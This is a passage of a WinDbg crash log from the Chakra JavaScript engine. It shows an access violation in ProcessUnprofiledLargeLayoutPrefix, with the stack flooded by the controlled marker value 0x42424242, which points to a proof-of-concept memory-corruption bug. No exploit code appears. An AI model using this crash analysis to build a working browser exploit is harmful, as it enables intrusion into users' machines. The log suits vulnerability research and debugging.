C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffe`94210000 00007ffe`94398000 C:\Windows\SYSTEM32\windows.globalization.dll ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\Windows\System32\uiautomationcore.dll (1590.5d8): Break instruction exception - code 80000003 (first chance) ntdll!DbgBreakPoint: 00007ffe`a1f48d70 cc int 3 0:035> g onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£ (1590.b70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> r rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98 rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025 rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00 r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760 r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270 r14=0000000000000000 r15=000002aa98205cc2 iopl=0 nv up ei pl nz ac pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> dq ecx 000000d8`b83f9e98 00000000`00000030 000002aa`86879760 000000d8`b83f9ea8 00010000`42424242 00010000`42424242 000000d8`b83f9eb8 00010000`42424242 00010000`42424242 000000d8`b83f9ec8 00010000`42424242 00010000`42424242 000000d8`b83f9ed8 00010000`42424242 00010000`42424242 000000d8`b83f9ee8 00010000`42424242 00010000`42424242 000000d8`b83f9ef8 00010000`42424242 00010000`42424242 000000d8`b83f9f08 00010000`42424242 00010000`42424242 0:016> dq [ecx+edx*8] 000000d8`b8400000 ????????`???????? ????????`???????? 000000d8`b8400010 ????????`???????? ????????`???????? 000000d8`b8400020 ????????`???????? ????????`???????? 000000d8`b8400030 ????????`???????? ????????`???????? 000000d8`b8400040 ????????`???????? ????????`???????? 000000d8`b8400050 ????????`???????? ????????`???????? 000000d8`b8400060 ????????`???????? ????????`???????? 000000d8`b8400070 ????????`???????? ????????`???????? 0:016> !address 000000d8`b8400000 Usage: Allocation Base: 000000d8`b8400000 Base Address: 000000d8`b8400000 End Address: 000000d8`b84fc000 Region Size: 00000000`000fc000 Type: 00020000 MEM_PRIVATE State: 00002000 MEM_RESERVE Protect: 00000000 More info: ~17k 0:016> !address ecx Usage: Stack Allocation Base: 000000d8`b7a00000 Base Address: 000000d8`b83f4000 End Address: 000000d8`b8400000 Region Size: 00000000`0000c000 Type: 00020000 MEM_PRIVATE State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE More info: ~16k 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 